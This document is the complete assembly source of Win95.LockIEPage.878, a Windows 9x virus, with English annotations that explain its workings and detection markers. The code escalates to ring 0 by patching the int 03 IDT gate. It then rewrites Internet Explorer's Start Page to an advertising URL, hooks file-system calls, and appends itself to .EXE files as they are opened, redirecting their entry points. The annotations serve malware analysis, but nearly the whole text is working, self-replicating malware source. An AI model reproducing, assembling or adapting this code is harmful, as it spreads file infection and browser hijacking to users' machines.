Win9x病毒--Win95.LockIEPage.878原代码 (Win9x virus — Win95.LockIEPage.878 original source: a Win95 ring-0 IE "Start Page" hijacker that also appends itself to .EXE files; reproduced for analysis)


Win9x病毒--Win95.LockIEPage.878原代码

Author: whg
Email: whg@whitecell.org
Homepage:http://www.whitecell.org

include win32v.inc
extrn ExitProcess: proc
.586p
.model flat,stdcall
.data
@@Start: ;Ring-3 entry of the virus body; after infection this is also the host's new entry point.
         ;The whole ring-0 escalation rests on two Win9x properties used right here and in @@SetMyInt03:
         ;sidt executes in ring 3, and the IDT page is writable from ring 3.
pushad ;save the host's registers; restored at @@Ring3GoNo before jumping to the host
push eax ;reserve 4 bytes: the 6-byte sidt result below straddles this slot
sidt [esp-2] ;IDTR -> [esp-2]: 16-bit limit at esp-2, 32-bit linear base lands at [esp]
pop esi ;esi = IDT linear base
add esi,3*8 ;gate descriptors are 8 bytes; esi -> gate for int 03 (breakpoint)
mov ecx,[esi]
mov edx,[esi+4] ;ecx:edx = original int 03 gate; @@MyInt03 writes it back as its first action
call @@SetMyInt03 ;the pushed return address is @@MyInt03; @@SetMyInt03 pops it into the gate's offset words
@@MyInt03: ;Ring-0 body, entered through the hijacked int 03 gate. General registers are those of the ring-3 caller.
pushad
mov [esi],ecx
mov [esi+4],edx ;first thing: restore the original int 03 gate, so the hijack window is a single instruction
mov eax,dr3 ;residency marker lives in debug register DR3 (readable only here, in ring 0)
mov ecx,VirusFlag ;VirusFlag == VirusSize (equates after @@VirusEnd)
@@IsInstalled:
cmp eax,ecx
jz @@ExitHook ;already resident this boot: skip payload and hook installation.
              ;Detection note: DR3 holding the virus length is an artefact of this loader.
mov dr3,ecx ;set the marker
call @@SetVxdCall ;re-emit `int 20h`+service id at every VxD call site (see @@SetVxdCall for why)
@@SetVxdCallOk:
;--- payload: HKCU\SoftWare\MicroSoft\Internet Explorer\Main, value "Start Page" := HttpName ---
push eax ;slot that receives the opened key handle
push esp ;-> that slot (phkResult)
call @@PushPathNameAddr ;pushes the address of PathName as the "return address" (the string follows the call)
PathName db 'SoftWare\MicroSoft\Internet Explorer\Main',0
@@PushPathNameAddr:
push 80000001h ;HKEY_CURRENT_USER
@@RegOpenKey:
int 20h ;VMM service 0148h: open the registry key from ring 0
dd 00010148h ;VMMCall_RegOpenKey (this 6-byte site is rewritten by @@SetVxdCall on every run)
add esp,3*4
pop ebp ;ebp = key handle
or eax,eax
jnz short @@OpenRegKeyError ;open failed: the hijack is skipped but the code still goes resident (label name misleads)
push 040h ;cbData = 64, larger than HttpName (26 chars + NUL): the bytes of the following instructions
          ;are stored into the registry value after the terminator as well
call @@PushHttpNameAddr ;pushes &HttpName (lpData)
HttpName db 'http://202.115.16.8/~ekang',0 ;the advertising page the browser is redirected to
@@PushHttpNameAddr:
push 01h ;dwType = REG_SZ
push 00h ;Reserved
call @@PushValueNameAddr ;pushes &ValueName (lpValueName)
ValueName db 'Start Page',0
@@PushValueNameAddr:
push ebp ;hKey
@@RegSetValueEx:
int 20h ;set IE "Start Page" to the advertising URL -- the browser-hijack payload
dd 00010152h ;VMMCall_RegSetValueEx
add esp,6*4
push ebp
@@RegCloseKey:
int 20h ;close the key handle
dd 00010149h ;VMMCall_RegCloseKey
add esp,1*4
@@OpenRegKeyError: ;--- go resident: allocate system pages and copy the body into them ---
push L 0fh ;flags (last argument, pushed first)
push L 00
push L -1
push L 00
push L 00
push L 00
push L 01 ;page type
push L 02 ;page count = 2 (0x2000 bytes), not 0x1000 as the original comment said: FilePathBuffer (100h)
          ;and ReadFileBuffer (900h), which follow @@VirusEnd, are used from this same allocation
@@AllocPage:
int 20h ;VMM service 0053h: allocate the pages for the resident copy
dd 00010053h ;VMMCall_AllocPage (original naming; presumably _PageAllocate -- confirm against the VMM service table)
add esp,8*4
or eax,eax
jz short @@ExitHook ;allocation failed: not resident, but DR3 is already set, so there is no retry this boot
mov edi,eax ;edi = new page (destination)
call @@GetVirusStartAddr
@@GetVirusStartAddr:
pop esi ;esi = address of this label
sub esi,OFF @@GetVirusStartAddr-OFF @@Start ;esi = runtime address of @@Start (position-independent delta)
mov ecx,VirusSize ;only the bytes up to @@VirusEnd are copied; the buffers after it are not
cld
rep movsb ;copy the body into the ring-0 page
mov edi,eax ;edi = page base again
add eax,OFF @@MyFileHookApi-OFF @@Start ;eax = address of the hook routine inside the page copy
push eax
@@HookFileApi:
int 20h ;IFSMgr service 0067h: install a file-system API hook -- every IFS request now passes @@MyFileHookApi
dd 00400067h ;VMMCall_HookFileSystem
add esp,04h
mov [edi+OFF OldFileHookApi-@@Start],eax ;returned value -> chained into by `jmp [OldFileHookApi]` in @@MyFileHookApi.
                                        ;The store goes into the PAGE copy (edi), not the image currently executing.
@@ClsOptFlag:
xor eax,eax ;clear the re-entrancy guard in the page copy
mov [edi.OFF OptFlag-OFF @@Start],eax
@@ExitHook:
popad
iretd ;back to ring 3 at the instruction after `int 03`, i.e. @@Ring3GoNo (the original comment calls it @@Ring3GoOn)
@@SetMyInt03: ;Ring 3. On entry [esp] = return address = @@MyInt03, which becomes the new int 03 handler.
cli ;ring-3 cli: presumably trapped and virtualized by the Win9x VMM rather than faulting -- confirm
pop W[esi] ;low 16 bits of @@MyInt03 -> gate offset 15:0 (16-bit pop, esp += 2)
pop W[esi+6] ;high 16 bits -> gate offset 31:16 (esp += 2); the return address is now consumed.
             ;Only the two offset words are written: the gate keeps its original ring-0 selector,
             ;type and DPL, which is what lets a ring-3 `int 03` land in ring 0.
             ;This store succeeds only because Win9x leaves the IDT writable from ring 3.
int 03 ;enter ring 0 at @@MyInt03; it restores the gate and returns here via iretd
@@Ring3GoNo: ;(referred to as @@Ring3GoOn in the comment at the iretd)
sti
popad ;host registers back as they were at @@Start
MoveToEax db 0b8h ;opcode of `mov eax,imm32`, hand-assembled so the immediate below is patchable data
OldAppEntry dd OFF @@Exit ;imm32: the host's original entry VA, written by @@OptFile at infection time.
                          ;In the dropper it is @@Exit, so the program simply terminates.
jmp eax ;transfer to the host's original code
;IFSFileHookFunc(pIFSfn,nfn,nDrv,nRType,nCP,pir);
;File-system API hook installed by @@MyInt03; executes inside the ring-0 page copy.
;Stack on entry: [esp]=return, +4=pIFSfn, +8=nfn, +12=nDrv, +16=nRType, +20=nCP, +24=pir (the ioreq).
@@MyFileHookApi:
pushad
mov ebp,esp ;argument k is at ebp+(8 saved regs + 1 return + k)*4
push ds
push es
push ss
pop ds
push ss
pop es ;flat data segments = ss
cmp D[ebp+(8+1+1)*4],36 ;nfn == 36 (a file-open request, per the original comment)?
jnz short @@OldFileHookApi ;everything else is passed straight through
call @@GetPathName ;candidate for infection
@@OldFileHookApi:
pop es
pop ds
popad
JmpMem dw 25ffh ;bytes FF 25 = `jmp dword ptr [mem32]`: chain to the previous hook through the
                ;pointer IFSMgr returned; the absolute operand follows.
OldFileHookApi dd ? ;operand of that jmp; filled in the page copy by @@MyInt03 after the hook call
OptFlag dd 00h ;re-entrancy guard: one global dword, not per-thread, so opens arriving while an
               ;infection is in progress are skipped rather than serialized
@@GetPathName: ;Build "X:<path>" in FilePathBuffer from the open request and infect it if it ends in ".EXE".
pop esi
push esi ;esi = return address (= @@OldFileHookApi), the base for page-relative addressing
@@IsOptFlagSet:
add esi,OFF OptFlag-OFF @@OldFileHookApi ;esi -> OptFlag in the page copy
mov ecx,VirusFlag
cmp [esi],ecx ;re-entered? (our own Ring0_FileIO calls in @@OptFile come back through this hook)
jz short @@RetOldHookApi
@@SetOptFlag:
mov [esi],ecx ;take the guard
add esi,OFF FilePathBuffer-OFF OptFlag
mov edi,esi ;edi -> FilePathBuffer (in the page)
mov eax,[ebp+(8+1+2)*4];nDrv (1=A, 2=B, 3=C, ...)
add ax,':A'-1 ;al = 'A'+nDrv-1, ah = ':' -> "X:" after the stosw
cld
stosw ;edi -> FilePathBuffer+2
mov esi,[ebp+(8+1+5)*4];pir: the ioreq
mov eax,[esi+0ch];ioreq+0Ch: pointer to the Unicode path (per the original comment)
add eax,04h ;skip 4 bytes, presumably the path-length header in front of the elements -- confirm
push L 0 ;charset
push L 100h ;max output length; only 0FEh bytes remain after the "X:" prefix, so a maximal path
            ;can spill into ReadFileBuffer, which directly follows FilePathBuffer
push eax ;source (Unicode)
push edi ;destination (ANSI)
@@UniToBCSPath:
Int 20h ;IFSMgr service 0041h: convert the Unicode path to ANSI at edi; eax = length as used below
dd 00400041h ;VMMCall_UniToBCSPath
add esp,4*4
or eax,eax
jz short @@ClearOptFlag ;conversion failed / empty
mov eax,[edi+eax-4] ;last 4 bytes of the converted path
not eax
cmp eax,not ('EXE.') ;equals ".EXE"? Compared through complements so the literal ".EXE" never appears
                     ;in the body (signature writers take note). Uppercase only as written; whether
                     ;UniToBCSPath upper-cases its output is not visible here.
jnz short @@ClearOptFlag
call @@OptFile
@@ClearOptFlag:
pop esi
push esi ;return address again, as the base
add esi,OFF OptFlag-OFF @@OldFileHookApi
xor eax,eax
mov [esi],eax ;release the guard
@@RetOldHookApi:
ret
@@OptFile: ;Append the body to the last section of the PE named in FilePathBuffer and redirect its entry point.
           ;Conditions enforced below: file >= 900h bytes, e_lfanew <= 700h, last section header inside
           ;the first 900h bytes, CheckSum != VirusFlag.
mov esi,edi
dec esi
dec esi ;edi was FilePathBuffer+2 (after the "X:" stosw); esi -> FilePathBuffer
mov ebp,esi ;ebp = path address; also the base for every buffer/offset computation below
mov eax,4300h
call @@FileIo ;IFSMgr_Ring0_FileIO: get attributes (original comment); ecx = attributes on return
jc @@OpenFileFalse
push ecx ;remember the attributes
xor ecx,ecx
mov eax,4301h
call @@FileIo ;set attributes to 0 so read-only/hidden/system do not block the open
xor eax,eax
mov edx,eax
inc edx ;edx = 1
mov ebx,edx
inc ebx ;ebx = 2
mov ax,0d500h
call @@FileIo ;open (original comment); ebx=2 / edx=1 are presumably access mode and "open existing"
              ;-- confirm against the Ring0_FileIO documentation
pop ecx ;original attributes
pushfd ;keep CF (the open result)
push eax ;keep the ring-0 file handle
mov eax,4301h
call @@FileIo ;put the original attributes back. Nothing here preserves the timestamp, so the
              ;last-write time of an infected file does change.
pop ebx ;ebx = file handle
popfd
jc @@OpenFileFalse ;open failed (attributes already restored)
@@GetReadFileBuffer:
add esi,size FilePathBuffer ;esi -> ReadFileBuffer (follows FilePathBuffer in the page)
mov ecx,size ReadFileBuffer ;900h bytes
xor edx,edx ;file offset 0
mov eax,0d600h ;read (original comment)
call @@FileIo
jc @@CloseFile
cmp eax,ecx
jnz @@CloseFile ;a short read rejects the file: targets smaller than 900h bytes are never infected
cmp word ptr [esi],'ZM' ;"MZ" DOS header?
jnz @@CloseFile
movzx eax,word ptr[esi+3ch] ;e_lfanew, low 16 bits only (the field is a dword)
cmp eax,size ReadFileBuffer-200h ;PE header must start within the first 700h bytes
ja @@CloseFile
add esi,eax ;esi -> PE header
cmp [esi.fhPEFlag],'EP' ;"PE" signature?
jnz @@CloseFile
cmp [esi.fhCheckSum],VirusFlag ;infection marker: optional-header CheckSum == virus length.
                               ;A clean file whose real checksum happens to equal it is skipped, and the
                               ;checksum of every infected file no longer validates -- both are indicators.
jz @@CloseFile
mov [esi.fhCheckSum],VirusFlag ;mark it (in the buffer only; written to disk at @@WriteBackFileHeader)
@@SaveOldAppEntryRVA:
mov eax,[esi.fhEntryRVA]
add eax,[esi.fhImageBase] ;original entry point as an absolute VA (assumes the host loads at ImageBase)
mov [ebp+OFF OldAppEntry-OFF FilePathBuffer],eax ;patch OldAppEntry in the page copy -- the image
                                                 ;that is written to the file below
movzx ecx,[esi.fhObjectCount]
dec ecx
mov eax,size ObjectTable
mul ecx ;eax = offset of the last section header from the section table start
cmp eax,size ReadFileBuffer-200h ;must lie inside what was read
ja short @@CloseFile
lea edi,[esi.fhObjectTable00+eax] ;edi -> last section header
mov edx,[edi.otPhysOffset]
add edx,[edi.otPhysSize] ;file offset where the body is appended: end of the last section's raw data
mov ecx,VirusSize
push esi
@@GetVirusBase:
mov esi,ebp
sub esi,OFF FilePathBuffer-OFF @@Start ;esi = page base, i.e. the resident copy with the patched OldAppEntry
mov eax,0d601h
call @@FileIo ;write VirusSize bytes at offset edx (original comment: write). The VxD call sites in this
              ;copy may already have been rewritten by the VMM; @@SetVxdCall undoes that in the victim.
pop esi
jc short @@CloseFile ;write failed: the header is not rewritten, so the entry point stays unchanged
@@SetNewEntryRVA:
mov eax,[edi.otPhysSize]
add eax,[edi.otRVA]
mov [esi.fhEntryRVA],eax ;new entry RVA = where the appended bytes land inside the last section
@@FixOtherHeaderVar: ;fix up the size fields
add [edi.otPhysSize],ecx ;SizeOfRawData += VirusSize, with no rounding to FileAlignment
mov eax,[edi.otPhysSize]
sub eax,[edi.otVirtSize]
jb short @@VirtSizeIsBigger
@@PhysSizeIsBigger:
add [edi.otVirtSize],eax ;grow VirtualSize by the overshoot
add [esi.fhImageSize],eax ;and SizeOfImage by the same amount, again unaligned. Section characteristics
                          ;are left untouched: the appended code runs with whatever flags the host's
                          ;last section already has.
@@VirtSizeIsBigger:
nop
@@GetReadFileBuffer0:
mov esi,ebp
add esi,size FilePathBuffer ;esi -> ReadFileBuffer again
@@WriteBackFileHeader:
mov ecx,size ReadFileBuffer
xor edx,edx
mov eax,0d601h
call @@FileIo ;write the modified first 900h bytes back at offset 0
@@CloseFile:
mov eax,0d700h
call @@FileIo ;close the handle in ebx
@@OpenFileFalse:
ret
@@FileIo: ;IFSMgr_Ring0_FileIO trampoline. Inputs in registers (eax = function code; ebx/ecx/edx/esi as each
          ;caller sets them). Every caller tests CF afterwards, so failure is reported through the carry flag.
int 20h ;IFSMgr service 0032h
dd 00400032h ;VMMCall_IFSMgr_Ring0_FileIO (this site, too, is re-emitted by @@SetVxdCall)
ret
@@SetVxdCall: ;Re-emit `int 20h` + service id at all seven VxD call sites (runs in ring 0, from @@MyInt03).
              ;"Restore" in the original comment refers to the Win9x VMM replacing an executed int 20h/id pair
              ;with a direct call; because the body written into victims is the already-executed resident
              ;copy, an infected file would otherwise carry absolute call targets from another boot.
pop ebx
push ebx ;ebx = return address = @@SetVxdCallOk, the base for every site offset below
mov ax,020cdh ;bytes CD 20 = `int 20h`
lea esi,[ebx+OFF @@VxdCallTable-@@SetVxdCallOk] ;esi -> table of service ids, consumed in site order
cld
lea edi,[ebx+OFF @@RegOpenKey-OFF @@SetVxdCallOk]
stosw
movsd ;site 1: RegOpenKey
lea edi,[ebx+OFF @@RegSetValueEx-OFF @@SetVxdCallOk]
stosw
movsd ;site 2: RegSetValueEx
lea edi,[ebx+OFF @@RegCloseKey-OFF @@SetVxdCallOk]
stosw
movsd ;site 3: RegCloseKey
lea edi,[ebx+OFF @@AllocPage-OFF @@SetVxdCallOk]
stosw
movsd ;site 4: AllocPage
lea edi,[ebx+OFF @@HookFileApi-OFF @@SetVxdCallOk]
stosw
movsd ;site 5: HookFileApi
lea edi,[ebx+OFF @@UniToBCSPath-OFF @@SetVxdCallOk]
stosw
movsd ;site 6: UniToBCSPath
lea edi,[ebx+OFF @@FileIo-OFF @@SetVxdCallOk]
stosw
movsd ;site 7: FileIo. The table at @@VxdCallTable must stay in exactly this order.
ret
@@VxdCallTable: ;service ids, in the order @@SetVxdCall consumes them
dd 00010148h ;VMMCall_RegOpenKey
dd 00010152h ;VMMCall_RegSetValueEx
dd 00010149h ;VMMCall_RegCloseKey
dd 00010053h ;VMMCall_AllocPage
dd 00400067h ;IFSCall_HookFileApi
dd 00400041h ;IFSCall_UniToBCSPath
dd 00400032h ;IFSCall_FileIo
VirusMsg db 'Lock IE Start Page Ver 2.0,By Whg 2001.6.13',0 ;never referenced by code; a static signature string
@@VirusEnd: ;end of the bytes copied to the ring-0 page and appended to victims
VirusSize=OFF @@VirusEnd-OFF @@Start ;body length (878 bytes if the family name reflects it -- confirm by assembling)
VirusFlag=VirusSize ;doubles as the DR3 residency marker, the OptFlag guard value and the PE CheckSum infection marker
FilePathBuffer db 100h dup(?) ;ANSI path of the file being opened; working storage used from the ring-0 page, not copied
ReadFileBuffer db 900h dup(?) ;first 900h bytes of the candidate PE; directly follows FilePathBuffer
.code
@@Exit: ;Dropper-only exit: OldAppEntry points here until an infection patches it, so the dropper just terminates.
call ExitProcess,L 0
ends
end @@Start ;entry point is @@Start inside the .data section -- the dropper executes from its data segment